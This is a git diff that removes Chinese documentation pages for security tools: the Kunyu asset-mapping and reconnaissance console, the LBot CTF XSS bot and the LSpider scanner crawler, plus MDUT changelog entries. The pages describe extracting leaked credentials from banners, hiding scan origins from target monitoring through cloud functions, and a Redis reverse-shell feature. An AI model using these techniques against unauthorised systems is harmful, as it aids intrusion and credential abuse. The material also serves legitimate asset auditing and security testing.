-- 更新了社区化的部署方案，支持使用公开的Server端查看扫描结果，为后续延展提供基础  
-- 更新了潮汐平台链接，可以使用潮汐平台快速部署体验
-
-#### [v2.6.4.2] - 2022-03-02
-
-**修复**  
-- 修复了几个PHP的语法支持问题  
-- 修复了组件扫描中关于pom.xml静态扫描的几个语法解析错误  
-- 修改了组件数据储存格式
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/Kunyu.md b/detail/Kunyu.md
deleted file mode 100644
index c294099ee..000000000
--- a/detail/Kunyu.md
+++ /dev/null
@@ -1,487 +0,0 @@
-## Kunyu <https://github.com/knownsec/Kunyu>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![Author](https://img.shields.io/badge/Author-风起-orange)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/Kunyu.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.7.2-red)
-![Time](https://img.shields.io/badge/Join-20211122-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-中文文档 | [English](../README.md)
-
-# 0x00 介绍
-
-## 工具介绍
-
-Kunyu (坤舆)，名字取自 <坤舆万国全图> ，测绘实际上是一个地理信息相关的专业学科，针对海里的、陆地的、天上的地理信息进行盘点。同样应用于网络空间，发现未知、脆弱的资产也是如此，更像是一张网络空间地图，用来全面描述和展示网络空间资产、网络空间各要素及要素之间关系，以及网络空间和现实空间的映射关系。所以我认为“坤舆”还是比较贴合这个概念的。
-
-Kunyu(坤舆)，旨在让企业资产收集更高效，使更多安全相关从业者了解、使用网络空间测绘技术。
-
-## 应用场景
-
-对于 kunyu 的使用，应用场景可以有很多，例如：
-
-* 企业内遗忘的，孤立的资产进行识别并加入安全管理。 
-* 企业外部暴露资产进行快速排查，统计。
-* 红蓝对抗相关需求使用，对捕获IP进行批量检查。
-* 批量收集脆弱资产(0day/1day) 影响内的设备、终端。
-* 新型网络犯罪涉案站点信息进行快速收集，合并，进行更高效的研判、分析。
-* 对互联网上受相关漏洞影响的脆弱资产，进行统计、复现。
-* .......
-
-# 0x01 安装
-
-**需要Python3以上的支持**
-
-```
-git clone https://github.com/knownsec/Kunyu.git
-cd Kunyu
-pip3 install -r requirements.txt
-
-Linux:
-	python3 setup.py install
-	kunyu console
-
-Windows:
-	cd kunyu
-	python3 console.py
-
-PYPI:
-	pip3 install kunyu
-	
-P.S. Windows同样支持python3 setup.py install
-```
-
-# 0x02 配置说明
-在第一次运行程序时通过输入以下命令进行初始化操作，提供了其他登录方式，但是推荐使用API的方式，因为用户名/密码登录需要额外做一次请求，所以理论上API的方式会更加高效。
-```
-kunyu init --apikey <your zoomeye key> --seebug <your seebug key>
-```
-![](https://github.com/knownsec/Kunyu/raw/main/images/setinfo.png)
-
-初次使用需要通过ZoomEye登录凭证，才使用该工具进行信息收集，目前ZoomEye注册用户每月赠送1w条查询额度，足够日常工作使用。
-
-**ZoomEye访问地址：https://www.zoomeye.org/**
-
-**Seebug访问地址：https://www.seebug.org/**
-
-可以通过以下命令自定义输出文件路径 ，默认输出路径为:C:\Users\active user\kunyu\output\
-
-```bash
-kunyu init --output C:\Users\风起\kunyu\output
-```
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/setoutput.png)
-
-# 0x03 工具使用
-
-## 命令详解
-
-```
-kunyu console
-```
-![](https://github.com/knownsec/Kunyu/raw/main/images/infos.png)
-
-**Kunyu Command**
-
-```
-Global commands:
-        info                                      Print User info
-        SearchHost <query>                        Basic Host search
-        SearchWeb <query>                         Basic Web search
-        SearchIcon <File>/<URL>                   Icon Image search
-        SearchBatch <File>                        Batch search Host
-        SearchCert <Domain>                       SSL certificate Search
-        SearchDomain <Domain>                     Domain name associated/subdomain search
-        EncodeHash <encryption> <query>           Encryption method interface 
-        HostCrash <IP> <Domain>                   Host Header Scan hidden assets
-        show <config>/<rule>                      Show can set options or Kunyu config
-        Seebug <query>                            Search Seebug vulnerability information
-        set <option>                              Set Global arguments values
-        view/views <ID>                           Look over banner row data information
-        Cscan <IP>/<Port>                 	  Scans port information about cobaltStrike
-        PupilSearch <URL>/<ID>                    Example Query sensitive interfaces
-        Pocsuite3                                 Invoke the pocsuite component
-        ExportPath                                Returns the path of the output file
-        CreateMap                                 Generate an IP distribution heat map
-        AliveScan                                 The viability of the last retrieval
-        clear                                     Clear the console screen
-        help                                      Print Help info
-        exit                                      Exit KunYu &
-```
-
-**OPTIONS**
-
-```
-ZoomEye:
-		page <Number>    			查询返回页数(默认查询一页，每页20条数据)
-		dtype <0/1>      			查询关联域名/子域名(设置0为查询关联域名，反之为子域名)
-		stype <v4/v6>	 			设置获取数据类型IPV4或IPV6，默认为 ipv4,ipv6 全选
-		btype <host/web> 			设置批量查询的API接口(默认为HOST)
-		timeout <num>	 			设置Kunyu HTTP请求的超时时间
-		thread  		 		设置PupilSearch线程数量(默认为10)
-		deep   			 		设置PupilSearch递归深度(默认为2)
-		all  			 		PupilSearch Add All Url To Check List
-		fuzz   			 		PupilSearch Add Api To Check List
-    		proxy  			 		PupilSearch HTTP Proxy
-```
-
-## 使用案例
-
-*Kunyu（坤舆）的使用教程如下所示*
-
-**用户信息**
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/userinfo.png)
-
-**HOST 主机搜索**
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/searchhost.png)
-
-**Web 主机搜索**
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/searchweb.png)
-
-**批量 IP 搜索**
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/searchbatch.png)
-
-**Icon 搜索**
-
-在搜集企业资产时，我们可以使用这样的方式进行检索相同 ico 图标资产，在关联相关企业资产时，通常会有不错的效果。但是需要注意的是如果某些站点也使用这个 ico 图标，可能会关联出无关资产(但是无聊用别人 ico 图标的人总归是少数吧)。支持url或本地文件的方式搜索。
-
-**命令格式：**
-
-SearchIocn https://www.baidu.com/favicon.ico
-
-SearchIcon /root/favicon.ico
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/searchico.png)
-
-**SSL证书搜索**
-
-通过 SSL 证书的序列号进行查询，这样关联出来的资产较为精准，能搜索出使用相同证书的服务。碰到https站点时，可以通过这样的方式。
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/searchcert.png)
-
-**特征搜索**
-
-通过HTTP请求包特征或网站相关特征可以进行更加精准的串并相同框架资产
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/headersearch.png)
-
-**多因素查询**
-
-同样kunyu也支持多因素条件查询关联资产，可以通过ZoomEye逻辑运算语法实现。
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/factor.png)
-
-**关联域名/子域名搜索**
-
-对关联域名以及子域名进行搜索，默认查询关联域名，可以通过设置 dtype 参数设置 **关联域名/子域名** 两种模式。
-
-命令格式：**SearchDomain Domain**
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/searchdomain.png)
-
-**设置获取数据类型**
-
-在V1.6.1版本后，用户可以通过stype参数设置获取的数据类型为IPV4或者IPV6，实现应用场景，默认参数为v4。
-
-命令格式：**set stype = v6**
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/stype.png)
-
-**查看Banner信息**
-
-用户可以通过view命令查看指定序号对应信息的Banner，从而进一步分析前端代码及Header头，用户可以截取banner信息进一步的关联匹配。
-
-命令格式: **view ID**
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/view.png)
-
-用户也可以通过views命令查看指定序号的SSL证书信息，通过提取SLL证书信息中的敏感信息进一步关联。
-
-命令格式：**views ID**
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/views.png)
-
-**Cscan扫描cobaltStrike的端口信息**  
-
-Cscan是Kunyu 1.7.2版本的一个新特性，允许您使用此命令来识别网络资产是否为cobaltStrike，并列举配置文件的详细信息。  
-
-**命令格式:**
-
-Cscan 1.1.1.1 443  
-
-Cscan 1.1.1.1 443, 80  
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/cscan.png)
-
-**PupilSearch敏感信息收集**
-
-在Kunyu v1.7.0版本后，移除了KeyWord命令替换为PupilSearch，就是提取敏感数据的功能，当然也支持通过空间测绘提取历史banner信息，举个例子像accesskey这种，历史数据中banner泄露了敏感信息，哪怕现在换了服务，但是AK/SK没有过期，依旧可以直接利用，懂得都懂，支持提取敏感信息**（身份证号、IP、JWT、API接口、appid、appkey、GithubAccessKey，default username\password、邮箱等）**。
-
-命令格式：
-
-**PupilSearch https://www.domain.com/**
-
-**PupilSearch ID	(通过空间测绘返回的banner提取敏感信息)**
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/pupilsearch_1.png)
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/pupilsearch_2.png)
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/pupilsearch_3.png)
-
-**系统命令执行**
-
-在Kunyu v1.6.0后增加了对系统命令执行的支持，可以通过执行常用的一些系统命令进行更方便有效的调试测绘数据，具体可执行命令列表可见README文件Issue中第11条。
-
-**示例一**
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/systems.png)
-
-**示例二**
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/system.png)
-
-**编码哈希计算**
-
-在一些场景下，可以通过该命令进行常用的HASH加密/编码，如：BASE64、MD5、mmh3、HEX编码，通过这种方式进行调试。
-
-**命令格式：**
-
-EncodeHash hex 7239dcc9beb5c9cd795415f9
-EncodeHash md5 https://www.baidu.com/favicon.ico
-EncodeHash md5 /root/favicon.ico
-EncodeHash mmh3 https://www.baidu.com/favicon.ico
-EncodeHash mmh3 /root/favicon.ico
-EncodeHash base64 dasdasdsa
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/encode.png)
-
-**资产存活性扫描**
-
-Kunyu V1.6.5版本后，增加了对最后一次检索结果进行存活性扫描，结果通过轮询的方式实时输出。
-
-**Seebug漏洞查询**
-
-通过输入想要查找的框架、设备等信息，查询历史相关漏洞，但是需要注意仅支持英文，这里后期会进行改进，升级。
-
-命令格式: **Seebug tongda**
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/seebug.png)
-
-**加载指纹文件**
-
-Kunyu V1.6.4版本新增了加载外部指纹库的功能，Kunyu默认提供了5条指纹文件作为参考，用户可以编写自己的指纹文件进行加载或分享使用，更加灵活的进行检索，方便在溯源、安全研究、红队攻防中资源共享，增强团队协作。
-
-可以通过**show rule**命令查看当前加载指纹库的信息。
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/rule.png)
-
-默认读取指纹文件目录是在**项目目录/kunyu/rule**下，可以通过**kunyu init --rule C:\风起\rule**进行自定义读取指纹文件路径的设置。
-
-可以使用**show config**命令查看kunyu配置文件的信息。
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/showconfig.png)
-
-在面对复杂的指纹信息时，可以通过**项目目录/kunyu/createrule.py**生成yaml文件
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/createrule.png)
-
-yaml指纹文件格式如下，需要注意要严格按照下面标准格式，不能缺少字段。
-
-```bash
-KXID: kx-2022-07
-author: 风起
-createDate: 2022-1-4
-description: 查找公网部署的ngrok反向代理
-kx_name: ngrok代理工具指纹
-kx_query: '''Server: beegoServer:1.12.0'' +''<a href="/login/index">Found</a>.'''
-source: https://github.com/wikiZ/Kunyu
-```
-
-**设置参数**
-
-当设置set page = 2时，返回结果为40条，大家可以通过修改page参数，设置查询的页数，需要注意1 page = 20/条 ，可以根据需求修改该值，获取更多返回结果。
-
-通过show显示可配置的参数，以及参数当前的值。
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/show.png)
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/set.png)
-
-**Pocsuite3 联动**
-
-在v1.3.1之后的版本中，您可以使用kunyu进行联动pocsuite3的console模式进行一体化的使用。
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/pocsuite.png)
-
-**HOSTS头碰撞**
-
-通过HOSTS碰撞，可以有效的碰撞出内网中隐藏的资产，根据中间件httpf.conf中配置的ServerName域名和IP捆绑访问即可直通内网业务系统！后续通过设置本地hosts文件实现本地DNS解析，因为本地hosts文件优先级高于DNS服务器解析。支持通过ZoomEye域名库反查或者读取TXT文件获取域名列表。
-
-**命令格式：**
-
-HostCrash C:\ip.txt C:\host.txt
-HostCrash C:\ip.txt baidu.com
-HostCrash 1.1.1.1 baidu.com
-HostCrash 1.1.1.1 G:\host.txt
-
-**示例一**
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/searchcrash.png)
-
-**示例二**
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/searchcrashs.png)
-
-**Serverless HostCrash Scan**
-
-Kunyu v1.6.2新增了一个有意思的功能，结合云函数对目标进行HOSTS碰撞，通过这样的方式有效的隐藏了我们的扫描IP防止被目标态势感知捕捉到，也防止了WAF对真实IP的封禁，并对特征进行了隐匿，通过下面的扫描效果可以发现扫描的IP均为云服务厂商且每次扫描均为随机IP地址，可以通过初始化时配置云函数地址的方式自主选择是否启用。
-
-**配置导读：** [云函数的配置方法](https://github.com/knownsec/Kunyu/blob/main/doc/Serverless_CN.md)
-
-**相关技术：**https://www.anquanke.com/post/id/261551
-
-**态势感知扫描效果：**
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/serverless.png)
-
-**资产分布地图**
-
-v1.6.2新增CreateMap命令，可对上次检索的资产生成地理位置分布图，更形象的描述网络空间和现实空间的映射关系，与Excel位于相同的输出目录下，生成的资产图与上次搜索结果的条数相关。
-
-**生成分布图**
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/createmap.png)
-
-**Web页面**
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/map.png)
-
-**数据结果**
-
-搜索的所有结果都保存在用户根目录下，并根据当前时间戳创建目录。单次启动的所有查询结果都在一个目录下，保存为Excel格式，给予更加直观的体验。可以通过ExportPath命令返回输出路径。
-
-![](https://github.com/knownsec/Kunyu/raw/main/images/output.png)
-
-
-# 0x04 Loading
-
-​    感谢各位用户的支持，Kunyu也会坚持进行完善更新的，希望 Kunyu (坤舆)能够让更多安全从业者所知，工具框架有参考昆仑镜、Pocsuite3，都是非常棒的作品。	
-
-​    感谢 KnownSec 404 Team 的全体小伙伴。	
-
-​	**关于开发者 风起 相关文章：https://www.anquanke.com/member.html?memberId=148652**																																																	
-
-> “ 看得清 ” 是能力的体现，是 “ 器 ” ，而 “ 看得见 ” 就是思想的体现，那最后关联的是 “ 道 ”。
->
-> ​																																							 	   --SuperHei
-
-# 0x05 Issue
-
-**1、多因素搜索**
-
-ZoomEye搜索可以使用多因素搜索，dork：cisco +port:80(注意空格) 可以搜索符合cisco以及port:80条件的所有数据，如果没有中间的空格则为同一搜索条件，则为满足cisco并且端口为80的所有数据。Kunyu的dork无需引号。
-
-**2、高精地理位置**
-
-ZoomEye给予特权用户高精地理位置的数据，但是需要注意的是普通用户，则不具备该功能，望周知。
-
-**3、用户名/密码登录**
-
-如果您使用的是username/password作为初始化条件，那么所获得token时效为12小时，如果发现您的搜索不能返回数据，那么不妨info一下，如果会话超时则会返回初始化命令提示。绝大多数情况下我们建议您使用API KEY的方式，则不存在失效问题。这样的设计也是为了您账号密码的安全性，毕竟API KEY可以重置，token会失效，但是有了账号密码，则有可能登录您的ZoomEye账户。
-
-**4、Cert证书搜索**
-
-需要注意的是，按照常规逻辑，您需要将目标ssl证书的序列号进行十六进制编码后才能配合语句搜索，但是Kunyu则仅需要提供Domain地址则可以检索。原理是对目标站做了一次请求获取到了序列号并进行处理，但是如果您的主机无法访问需要搜索的目标则无法检索，这时您也可以按照常规方法配合语句搜索。
-
-**5、Favicon图标搜索**
-
-ico图标搜索既支持URL检索，又支持本地ico图标文件搜索，这样有了更好的延展性，以及兼容性。
-
-**6、查询数据保存路径**
-
-默认情况下您的查询数据在用户目录下的Kunyu文件夹中，您也可以在console模式中使用ExportPath命令查询路径。
-
-**7、自动补全**
-
-Kunyu的自动补全支持大小写，命令记录等，使用Tab进行补全，用法参见Metasploit即可。
-
-**8、关于pip install kunyu使用时报错的问题**
-
-在使用pip install kunyu时报以下错误：
-`File "C:\Users\风起\AppData\Local\Programs\Python\Python37\Scripts\kunyu-script.py", line 1 SyntaxError: Non-UTF-8 code starting with '\xb7' in file C:\Users\风起\AppData\Local\Programs\Python\Python37\Scripts\kunyu-script.py on line 1, but no encoding declared; see http://python.org/dev/peps/pep-0263/ for details`
-
-解决方案：
-修改C:\Users\风起\AppData\Local\Programs\Python\Python37\Scripts\kunyu-script.py文件，在文件开头添加# encoding: utf-8
-然后保存即可正常使用，该bug出现原因为用户目录路径存在中文名，通常出现在windows上。
-
-**9、Pocsuite3模块POC存放目录**
-
-对于使用pocsuite3模块时，如果想要新增POC模块，则可以在 **项目目录/pocsuite3/pocs/** 添加POC文件。需要注意的是，当使用打包好的Kunyu console命令时应添加POC到该目录，并重新打包kunyu程序才可以正常加载POC。
-
-**10、Pocsuite3模块POC缺失问题**
-
-使用Pocsuite命令联动时，如果是已经打包好的Kunyu版本，则poc已经被固定，这时修改poc目录是无法新增模块的，这时可以通过重新打包的方式，或者使用 **项目目录/kunyu/console.py** 运行kunyu可实时更新poc模块。
-
-**11、Kunyu可执行系统命令如下。**
-
-**Windows:**
-        OS_SYSTEM = [**"ipconfig", "dir", "whoami", "ping", "telnet", "cd", "findstr", "chdir","find", "mysql", "type", "curl", "netstat", "tasklist", "taskkill", "tracert", "del", "ver","nmap"**]
-
-**Linux/Mac：**
-
-​	OS_SYSTEM = [**"ifconfig", "ls", "cat", "pwd", "whoami", "ping", "find", "grep", "telnet", "mysql", "cd", "vi", "more", "less", "curl", "ps", "netstat", "rm", "touch", "mkdir", "uname","nmap"**]
-
-**12、Kunyu运行环境**
-
-这里建议使用Python3.2 — 3.9版本，Python3其他版本可能会有未知的报错，**Python2不可使用**。
-
-**13、设置超时时间**
-
-如果HTTP请求没有得到及时响应，可以通过增大timeout时间解决，如:set timeout = 50
-
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-- 2021-11-23 发布文章[《Kunyu (坤舆) : 更高效的企业资产收集》](https://mp.weixin.qq.com/s/mjPDX8PhfnpjmS6LaMcD_A)
-
-## 最近更新
-
-#### [v1.7.2] - 2022-04-20
-
-**更新**  
-- 新增 Cscan 命令，用于识别 cobaltstrike 服务以及相关信息  
-- 修复经纬度数据丢失的问题
-
-#### [v1.7.1] - 2022-03-22
-
-**更新**  
-- 优化'敏感信息搜索'功能的正则规则  
-- 修复 HTTP 域名识别错误的问题  
-
-
-#### [v1.7.0] - 2022-03-18
-
-**添加**  
-- 部分代码进行了重构，优化了程序结构  
-- 添加了'敏感信息搜索'功能
-
-#### [v1.6.5] - 2022-02-25
-
-**新增**  
-- 增加了对查询结果存活检测的功能  
-- 修复了一些模块不兼容问题
-
-#### [v1.6.4] - 2022-01-04
-
-**新增**  
-- 添加了“显示规则”/“显示配置”命令  
-- 增加了外部加载指纹文件的功能
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/LBot.md b/detail/LBot.md
deleted file mode 100644
index d274dacd6..000000000
--- a/detail/LBot.md
+++ /dev/null
@@ -1,158 +0,0 @@
-## LBot <https://github.com/knownsec/LBot>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![Author](https://img.shields.io/badge/Author-LoRexxar@knownsec404-orange)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/LBot.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.1-red)
-![Time](https://img.shields.io/badge/Join-20200921-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-
-LBot的基础模型是脱胎于LSpider诞生的多线程任务调度模型。
-
-主要是用于方便的写一个xss的bot程序。
-
-使用者可以简单的修改其逻辑以及配置环境，即可获得一个简单的xss的bot程序。由于原型来自于爬虫程序，所以只要前端有一定的频率限制，后端很难出现问题，比较稳定。
-
-# install
-
-## 下载Lbot
-
-```
-git clone https://github.com/knownsec/LBot.git
-```
-
-## 修改配置文件
-
-```
-cp LBot/settings.py.bak LBot/settings.py
-```
-
-并配置其中相关的mysql配置
-
-```
-DATABASES = {
-    'default': {
-        'ENGINE': 'django.db.backends.mysql',
-        'NAME': 'disable',
-        'USER': 'root',
-        'PASSWORD': '',
-        'HOST': '127.0.0.1',
-        'PORT': '3306',
-        'OPTIONS': {
-            'init_command': 'SET default_storage_engine=INNODB;SET NAMES utf8mb4',
-            'charset': 'utf8mb4',
-        },
-        'TEST': {
-            'CHARSET': 'utf8',
-            'COLLATION': 'utf8_general_ci',
-        },
-    }
-}
-```
-## 配置环境
-
-```
-python3 -m pip install django
-```
-
-如果mysqlclient无法安装，还需要提前安装
-
-```
-sudo apt-get install libmysqlclient-dev
-```
-
-## 同步数据库配置
-
-```
-python3 manage.py makemigrations
-python3 manage.py migrate
-```
-
-## 配置chrome headless
-
-```
-sudo wget http://www.linuxidc.com/files/repo/google-chrome.list -P /etc/apt/sources.list.d/
-
-wget -q -O - https://dl.google.com/linux/linux_signing_key.pub  | sudo apt-key add -
-
-sudo apt-get update
-
-sudo apt-get install google-chrome-stable
-```
-
-看一下chrome的版本
-
-```bash
-lorexxar@instance-1:~/lorexxar/lspider/LSpider$ google-chrome --version
-Google Chrome 81.0.4044.138 
-```
-
-去官网下载对应版本的webdriver放在bin目录下
-
-```
-https://chromedriver.chromium.org/downloads
-```
-
-修改名字
-```bash
-mv bin/chromedriver bin/chromedriver_linux64
-
-```
-
-## 针对守护的xss题目魔改bot程序
-
-主流的xss bot守护方式一共有两种，一种是依靠cookie或者ip限制bot访问，另一种是通过登录账号模拟管理员的bot。
-
-```
-# Bot admin pass
-CTF_BACK_USER = 'admin'
-CTF_BACK_PASS = 'adminsecretpass'
-CTF_BACK_COOKIE = "s3cr3t_k3y_f0r_4dmin"
-```
-
-如果是依赖cookie的需要设置HOME_PAGE
-```
-# homepage
-
-HOME_PAGE = "http://127.0.0.1/index.php"
-```
-
-核心bot部分主要在`Botend\views.py` function `LBotCore`
-
-```
-    reportt = ReportTask.objects.filter(aread=0).first()
-    
-    if not reportt:
-        continue
-    
-    # 任务锁
-    reportt.aread = 1
-    reportt.save()
-    
-    # cookie 方式
-    report_url = reportt.url
-    cookies = "admin="+CTF_BACK_COOKIE
-    
-    self.req = LReq(is_chrome=True)
-    
-    # 访问目标
-    self.req.get(report_url, 'RespByChrome', 0, cookies)
-
-```
-
-
-# usage
-
-```
-python3 manage.py LBotCoreBackend
-```
-
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/LSpider.md b/detail/LSpider.md
deleted file mode 100644
index 8e50bcb94..000000000
--- a/detail/LSpider.md
+++ /dev/null
@@ -1,146 +0,0 @@
-## LSpider <https://github.com/knownsec/LSpider>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![Author](https://img.shields.io/badge/Author-LoRexxar-orange)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/LSpider.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.0.2-red)
-![Time](https://img.shields.io/badge/Join-20200821-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-
-# LSpider
-
-LSpider - 一个为被动扫描器定制的前端爬虫
-
-# 什么是LSpider?
-
-一款为被动扫描器而生的前端爬虫~
-
-由Chrome Headless、LSpider主控、Mysql数据库、RabbitMQ、被动扫描器5部分组合而成。
-
-(1) 建立在Chrome Headless基础上，将模拟点击和触发事件作为核心原理，通过设置代理将流量导出到被动扫描器。
-
-(2) 通过内置任务+子域名api来进行发散式的爬取，目的经可能的触发对应目标域的流量。
-
-(3) 通过RabbitMQ来进行任务管理，支持大量线程同时任务。
-
-(4) 智能填充表单，提交表单等。
-
-(5) 通过一些方式智能判断登录框，并反馈给使用者，使用者可以通过添加cookie的方式来完成登录。
-
-(6) 定制了相应的Webhook接口，以供Webhook统计发送到微信。
-
-(7) 内置了Hackerone、bugcrowd爬虫，提供账号的情况下可以一键获取某个目标的所有范围。
-
-### 为什么选择LSpider?
-
-LSpider是专门为被动扫描器定制的爬虫，许多功能都是为被动扫描器而服务的。
-
-建立在RabbitMQ的任务管理系统相当稳定，可以长期在无人监管的情况下进行发散式的爬取。
-
-### LSpider的最佳实践是什么？
-
-**服务器1（2c4g以上）**: Nginx + Mysql + Mysql管理界面（phpmyadmin）
-
-将被动扫描器的输出位置设置为web路径下，这样可以通过Web同时管理结果以及任务。
-
-LSpider部署5线程以上，设置代理连接被动扫描器（被动扫描器可以设置专门的漏扫代理）
-
-**服务器2**（非必要，但如果部署在服务器1，那么就需要更好的配置）：RabbitMQ
-
-### 还有什么问题？
-
-LSpider从设计之初是为了配合像xray这种被动扫描器而诞生的，但可惜的是，在工具发展的过程中，深刻认识到爬虫是无法和被动扫描器拆分开来的。
-
-强行将应该在被动扫描器实现的功能在爬虫端实现简直是舍本逐末，所以我们发起了另一个被动扫描器项目，如果有机会，后续还会开源出来给大家。
-
-### 设计思路？
-
-[为被动扫描器量身打造一款爬虫-LSpider](https://lorexxar.cn/2021/01/28/lspider-design/)
-
-# Usage
-
-[安装&使用](https://github.com/knownsec/LSpider/blob/master/docs/init.md)
-
-你可以通过下面的命令来测试是否安装成功
-
-```
-python3 manage.py SpiderCoreBackendStart --test
-```
-
-通过dockerfile安装（不推荐的安装模式）
-```
-cd ./docker
-
-docker-compose up -d
-```
-
-[dockerfile 安装&使用](https://github.com/knownsec/LSpider/blob/master/docker/readme.md)
-
-**使用dockerfile安装，推荐修改其中必要的配置信息以避免安全漏洞诞生。**
-
-**值得注意的是，以下脚本可能会涉及到项目路径影响，使用前请修改相应的配置**
-
-建议配合screen来挂起进程
-
-启动LSpider webhook 与漏洞展示页面（默认端口2062）
-
-```
-./lspider_webhook.sh
-```
-
-启动LSpider
-```
-./lspider_start.sh
-```
-
-完全关闭LSpider
-```
-./lspider_stop.sh
-```
-
-启动被动扫描器
-```
-./xray.sh
-```
-
-# 一些关键的配置
-
-[配置说明](https://github.com/knownsec/LSpider/blob/master/docs/config.md)
-
-# 如何配置扫描任务 以及 其他的配置相关
-
-其中包含了如何配置扫描任务、鉴权信息、webhook。
-
-值得注意的是，文中提到的Cookie配置，格式为浏览器请求包复制即可。
-
-[如何配置扫描任务 以及 其他的配置相关](https://github.com/knownsec/LSpider/blob/master/docs/manage.md)
-
-扫描器结果输出到配置文件相同目录（默认为vuls/）,则可以通过web界面访问。
-
-![](https://github.com/knownsec/LSpider/raw/master/docs/6.png)
-
-# 使用内置的hackerone、bugcrowd爬虫获取目标
-
-使用hackerone爬虫，你需要首先配置好hackerone账号
-```
- python3 .\manage.py HackeroneSpider {appname}
-```
-![](https://github.com/knownsec/LSpider/raw/master/docs/4.png)
-
-同理，bugcrowd使用
-```
- python3 .\manage.py BugcrowdSpider {appname}
-```
-
-![](https://github.com/knownsec/LSpider/raw/master/docs/5.png)
-
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-- 2021-01-28 发布文章[《为被动扫描器量身打造一款爬虫 - LSpider》](https://paper.seebug.org/1473/)
-
-## 最近更新
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/MDUT.md b/detail/MDUT.md
index bb005fe66..c4f583ffe 100644
--- a/detail/MDUT.md
+++ b/detail/MDUT.md
@@ -3,7 +3,7 @@
 ![Language](https://img.shields.io/badge/Language-Java-blue)
 ![Author](https://img.shields.io/badge/Author-Ch1ngg-orange)
 ![GitHub stars](https://img.shields.io/github/stars/SafeGroceryStore/MDUT.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.1.1-red)
+![Version](https://img.shields.io/badge/Version-V2.0.7-red)
 ![Time](https://img.shields.io/badge/Join-20210702-green)
 <!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
 
@@ -41,58 +41,7 @@ MDUT 全称 Multiple Database Utilization Tools，是一款中文的数据库跨
 
 ## 最近更新
 
-#### [v2.1.1] - 2022-06-22
-
-**核心**  
-- 优化逻辑代码  
-- 更改用户协议窗口  
-- 重构 Http Tunnel 生成界面  
-
-**Mysql**  
-- 修正 Mysql 某些时候错误不弹窗  
-
-**Mssql**  
-- 将依赖包重新替换为 jTDS (Microsoft 官方驱动太多问题)  
-
-**Oracle**  
-- 增加oracle 单独上传功能  
-
-**Redis**  
-- 优化内部代码  
-- 再次修复 Redis 测试连接错误信息返回连接成功 Bug  
-- 增加反弹shell功能 (不推荐使用影响生产环境)  
-- 修复 Redis 某些时候错误不弹窗  
-- 增强 替换 SSH 公钥 功能
-
-#### [v2.1.0] - 2022-05-24
-
-**核心**  
-- 增加 HTTP 隧道功能(Redis暂不支持)  
-- 优化逻辑代码  
-- 加长默认超时时间  
-
-**Mssql**  
-- 修复下载文件 Bug  
-- 删除获取管理员密码功能  
-- 增加一键恢复所有组件功能   
-- 修正 CLR Hex String  
-
-**Oracle**  
-- 更改 JAVA Util 导入方式  
-- 优化 JAVA ShellUtil 代码  
-
-**Redis**  
-- 添加 slave-read-only 功能
-
-#### [v2.0.8] - 2021-12-01
-
-**核心**  
-- 修复 Mssql 连接 2000 时候的语句兼容性问题  
-- 设置程序默认编码  
